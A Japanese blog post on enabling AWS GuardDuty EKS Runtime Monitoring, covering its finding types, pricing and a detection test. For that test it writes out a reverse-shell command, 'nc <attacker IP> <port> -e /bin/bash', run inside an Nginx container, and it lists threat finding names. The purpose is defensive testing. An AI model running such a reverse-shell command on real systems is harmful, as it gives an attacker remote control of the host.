produced by Classmethod ˗ˏˋ 技術とビジネスの祭典 ˎˊ˗ Classmethod ODYSSEY 事前登録受付中

GuardDuty EKS Runtime Monitoring を有効化して検知させてみた

枡川健太郎

2023.04.25

この記事は公開されてから1年以上経過しています。情報が古い可能性がありますので、ご注意ください。

EKS Runtime Monitoring について

GuardDuty の EKS Runtime Monitoring 機能が 2023 年 3 月に利用できるようになりました。
これまで AWS のコンテナ環境でランタイムアクティビティからの脅威検出を実現するためには、Aqua Security や Sysdig Secure といった 3rd Party 製品を利用する必要がありました。
今回のアップデートにより、ランタイムの防御を AWS マネージドの機能で実現することが可能になりました。(現時点では EKS on EC2 のみ利用可能になります)
導入も簡単で、エージェントを自動的に管理する機能を有効化することで必要なリソースを自動でデプロイすることが可能です。　
ただ、VPC Endpoint 等が自動で作成されることになるので、全て IaC 側で管理したい場合等は自動管理機能をオフにすることも可能です。
その場合のセットアップについては下記ブログを参照下さい。

利用できる Findings(2023/04/25 時点)

利用可能な Findings は下記になります。
バックドアやトロイの木馬が疑われることの検知、権限昇格や Reverse Shell の疑いがあることの検知など幅広く対応しています。

CryptoCurrency:Runtime/BitcoinTool.B
Backdoor:Runtime/C&CActivity.B
UnauthorizedAccess:Runtime/TorRelay
UnauthorizedAccess:Runtime/TorClient
Trojan:Runtime/BlackholeTraffic
Trojan:Runtime/DropPoint
CryptoCurrency:Runtime/BitcoinTool.B!DNS
Backdoor:Runtime/C&CActivity.B!DNS
Trojan:Runtime/BlackholeTraffic!DNS
Trojan:Runtime/DropPoint!DNS
Trojan:Runtime/DGADomainRequest.C!DNS
Trojan:Runtime/DriveBySourceTraffic!DNS
Trojan:Runtime/PhishingDomainRequest!DNS
Impact:Runtime/AbusedDomainRequest.Reputation
Impact:Runtime/BitcoinDomainRequest.Reputation
Impact:Runtime/MaliciousDomainRequest.Reputation
Impact:Runtime/SuspiciousDomainRequest.Reputation
UnauthorizedAccess:Runtime/MetadataDNSRebind
Execution:Runtime/NewBinaryExecuted
PrivilegeEscalation:Runtime/DockerSocketAccessed
PrivilegeEscalation:Runtime/RuncContainerEscape
PrivilegeEscalation:Runtime/CGroupsReleaseAgentModified
Execution:Runtime/ReverseShell
DefenseEvasion:Runtime/FilelessExecution
Impact:Runtime/CryptoMinerExecuted
Execution:Runtime/NewLibraryLoaded
PrivilegeEscalation:Runtime/ContainerMountsHostDirectory
PrivilegeEscalation:Runtime/UserfaultfdUsage

EKS Runtime Monitoring finding types

料金について

GuardDuty の機能でよく採用されているトラフィック量による課金ではなく、vCPU 単位の課金になります。
そのため他機能より利用前の見積もりが実施しやすいかと思います。

最初の 500 個の vCPU /月 (監視対象の EKS インスタンスの場合) vCPU あたり 1.50USD
次の 4,500 個の vCPU /月 (監視対象の EKS インスタンスの場合) vCPU あたり 0.75USD
5,000 個以上の vCPU /月 (監視対象の EKS インスタンスの場合) vCPU あたり 0.25USD
Amazon GuardDuty の料金

他機能と同様に 30 日トライアルもあるので、気軽に試してみることも可能です。

有効化

EKS ランタイムモニタリングとエージェントを自動的に管理するにチェックを入れるだけです。
これだけで必要なリソースが自動でデプロイされます。

検知させてみた

Nginx がデプロイされている環境に侵入されたことを想定して、コンテナ内で ncat をインストールして Reverse Shell を試行してみました。

apt update
apt-get install nmap
nc <攻撃者の IP アドレス> <攻撃者が待ち受けているポート> -e /bin/bash

こちらに対して Execution:Runtime/NewBinaryExecuted が検知されました。
新しくインストールしたバイナリを実行したため、検知されたようです。

This finding informs you that a newly created or a recently modified binary file in a container was executed. It is the best practice to keep containers immutable at runtime, and binary files, scripts, or libraries should not be created or modified during the lifetime of the container. It is highly suspicious that the newly created binaries were executed in the container environment. This behavior is indicative of a malicious actor that has gained access to the workload, and has downloaded and executed malware or other software as part of the potential compromise. The runtime agent monitors events from multiple resource types. To identify the potentially compromised resource, view Resource type in the findings panel in the GuardDuty console.
Execution:Runtime/NewBinaryExecuted

どのコンテナで検知されたか実行ユーザーが確認可能です。

Execution:Runtime/ReverseShell は検知してくれなかったので単に接続を確立するだけではなく何か特徴的な行動をしないといけないのかもしれません。(どのような挙動をすると検知するかは公開されておらず、なかなか検知しなかったので諦めました...)
ただ、コンテナに新しくインストールされたバイナリ実行を検知するだけでもかなり安心感があります。

まとめ

ランタイムアクティビティから脅威検知をするという今までは一苦労だった内容が、簡単に実現できて感動しました。
イメージスキャン等を活用して脆弱性を生まないように作り込んでも、ゼロデイ脆弱性等は存在します。
ECR のイメージスキャンや監査ログの脅威検知と組み合わせて EKS Runtime Monitoring を利用することで、よりセキュアにコンテナ環境を利用できるようになります。
簡単に有効化できるので、気になる方は是非試してみて下さい！

GuardDuty EKS Runtime Monitoring を有効化して検知させてみた

EKS Runtime Monitoring について

利用できる Findings(2023/04/25 時点)

料金について

有効化

検知させてみた

まとめ

イベント

EVENT【5/29（水）大阪】Alteryxの使い方から導入メリットまですべてがわかるセミナー＆ワークショップ

EVENT【5/15（水）リモート】クラスメソッドの会社説明会を開催します

EVENT【5/8リモート】クラスメソッドのフリーランスエンジニア会社説明会〜フィンテック / リテール業界案件特集〜を開催します

EVENT【5/28（火）】AWSを最大活用するための1dayカンファレンス

EVENT【5/17（金）】認証機能の開発工数削減をデモで体験！次世代認証基盤サービス『Auth0 by Okta』導入実践ウェビナー

EVENT【5/14（火）】アノテーションの中途向けオンライン会社説明会を開催します

EVENT【5/23（木）】ユースケースに学ぶAWS運用のノウハウ～可視化から統制まで～

EVENT【5/16（木）】Snowflakeを触ってみよう！初めての方向けハンズオンセミナー

EVENT【5/10（金）名古屋】クラスメソッドグループの会社説明会を開催します！

EVENT【4/25（木）リモート】Google Cloudに携わるエンジニアのキャリア～クラスメソッド会社説明会～

GuardDuty EKS Runtime Monitoring を有効化して検知させてみた

EKS Runtime Monitoring について

利用できる Findings(2023/04/25 時点)

料金について

有効化

検知させてみた

まとめ

イベント

EVENT【5/29（水）大阪】Alteryxの使い方から導入メリットまですべてがわかるセミナー＆ワークショップ

EVENT【5/15（水）リモート】クラスメソッドの会社説明会を開催します

EVENT【5/8リモート】クラスメソッドのフリーランスエンジニア会社説明会 〜フィンテック / リテール 業界案件特集〜 を開催します

EVENT【5/28（火）】AWSを最大活用するための1dayカンファレンス

EVENT【5/17（金）】認証機能の開発工数削減をデモで体験！次世代認証基盤サービス『Auth0 by Okta』導入実践ウェビナー

EVENT【5/14（火）】アノテーションの中途向けオンライン会社説明会を開催します

EVENT【5/23（木）】ユースケースに学ぶAWS運用のノウハウ～可視化から統制まで～

EVENT【5/16（木）】Snowflakeを触ってみよう！初めての方向けハンズオンセミナー

EVENT【5/10（金） 名古屋】クラスメソッドグループの会社説明会を開催します！

EVENT【4/25（木）リモート】Google Cloudに携わるエンジニアのキャリア～クラスメソッド会社説明会～

関連記事

GuardDuty Findingsのフィードバック機能の動作をマネジメントコンソールとboto3で確認してみた

Amazon GuardDuty EC2 Runtime Monitoring 서비스가 정식 출시 되었습니다!

GuardDuty のマルウェアスキャンを実施した際に外部共有された EBS スナップショットが作成されたのはなぜでしょうか？

GuardDuty Malware Protection はインターネットにアクセス可能な構成でなければ利用できないのか教えてください

EVENT【5/8リモート】クラスメソッドのフリーランスエンジニア会社説明会〜フィンテック / リテール業界案件特集〜を開催します

EVENT【5/10（金）名古屋】クラスメソッドグループの会社説明会を開催します！